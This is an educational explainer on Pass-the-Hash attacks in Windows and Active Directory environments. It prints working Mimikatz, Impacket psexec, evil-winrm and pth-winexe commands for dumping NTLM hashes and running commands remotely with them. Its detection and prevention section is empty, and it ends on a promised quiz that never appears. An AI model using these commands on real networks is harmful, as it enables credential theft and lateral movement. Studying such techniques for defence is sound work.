Pass-the-Hash (PtH) is a cyberattack where an attacker captures hashed passwords and uses them to authenticate without cracking them. It exploits weak authentication mechanisms in Windows systems, allowing unauthorized access by reusing stolen hash values. Attackers often gain initial access via phishing or malware, then escalate privileges laterally across networks. Organizations can mitigate PtH attacks through strong authentication, least privilege access, credential protection, and implementing multifactor authentication (MFA).
What is a Pass-the-Hash (PtH) Attack?
Pass-the-Hash (PtH) is a post-exploitation attack where an attacker steals NTLM hashes and uses them to authenticate to systems without cracking the password.
Why is PtH Dangerous?
● No need to crack passwords – NTLM hashes act as authentication credentials.
● Works even if multi-factor authentication (MFA) is enabled (if only NTLM is used).
● Can be used for lateral movement in Active Directory (AD) environments.
________________________________________
How Pass-the-Hash (PtH) Works? (Step-by-Step)
Step 1: Attacker Gains Access to a Machine
● The attacker compromises a system (via phishing, exploit, or weak credentials).
● The attacker gains local admin privileges on the machine.
Step 2: Dump NTLM Hashes from Memory
● The attacker extracts stored NTLM hashes from LSASS (Local Security Authority Subsystem Service).
● This can be done using tools like Mimikatz, Hashdump, or SAM database access.
Example Mimikatz Command to Dump NTLM Hashes
mimikatz.exe
privilege::debug
lsadump::sam
Extracts NTLM hashes from the system.
________________________________________
Step 3: Use the NTLM Hash to Authenticate Without a Password
● Instead of cracking the NTLM hash, the attacker "passes" it to authenticate on remote systems.
● This allows access to servers, shared drives, and Active Directory (AD) resources.
Example PtH Attack Using Mimikatz
mimikatz.exe
sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<HASH> /run:powershell.exe
Runs a new session as Administrator using the NTLM hash.
________________________________________
Step 4: Lateral Movement and Privilege Escalation
● The attacker moves across the network using Remote Desktop (RDP), SMB, or WinRM.
● If the compromised account has Domain Admin privileges, the entire network is at risk.
Example Using Pass-the-Hash to Access Another Machine
pth-winexe -U 'DOMAIN/Administrator%<NTLM-HASH>' //10.0.0.2 cmd.exe
Executes commands on a remote machine using the stolen NTLM hash.
________________________________________
Tool |
Usage |
Mimikatz |
Extract NTLM hashes & perform PtH |
Impacket (psexec.py, wmiexec.py) |
Remote execution using NTLM hashes |
Metasploit (Pass-the-Hash module) |
Automates PtH attacks |
pth-winexe |
Authenticate via SMB using NTLM hashes |
Evil-WinRM |
Remote PowerShell access with NTLM hashes |
________________________________________
Example PtH Commands for Each Tool
1. Dump NTLM Hashes with Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
Extracts NTLM hashes from memory.
________________________________________
2. Authenticate Using Impacket’s psexec.py
python3 psexec.py DOMAIN/[email protected] -hashes :<NTLM-HASH>
Runs a command prompt on the target system using the hash.
________________________________________
3. Remote Execution Using Evil-WinRM
evil-winrm -i 10.0.0.2 -u Administrator -H <NTLM-HASH>
Gains remote PowerShell access using the stolen hash.
________________________________________
4. SMB Pass-the-Hash Attack (pth-winexe)
pth-winexe -U 'DOMAIN/Administrator%<NTLM-HASH>' //10.0.0.2 cmd.exe
Runs commands on a remote Windows machine via SMB using the stolen NTLM hash.
________________________________________
How to Detect & Prevent Pass-the-Hash Attacks?
Prevention (Security Hardening)
________________________________________
Summary
● Pass-the-Hash allows attackers to authenticate using NTLM hashes instead of passwords.
● It’s commonly used for lateral movement and privilege escalation in AD environments.
● Defenses include disabling NTLM, enabling Credential Guard, and monitoring suspicious logins.
Here are 15 one-word questions with their corresponding answers and hints based on the content about Pass-the-Hash (PtH) Attack: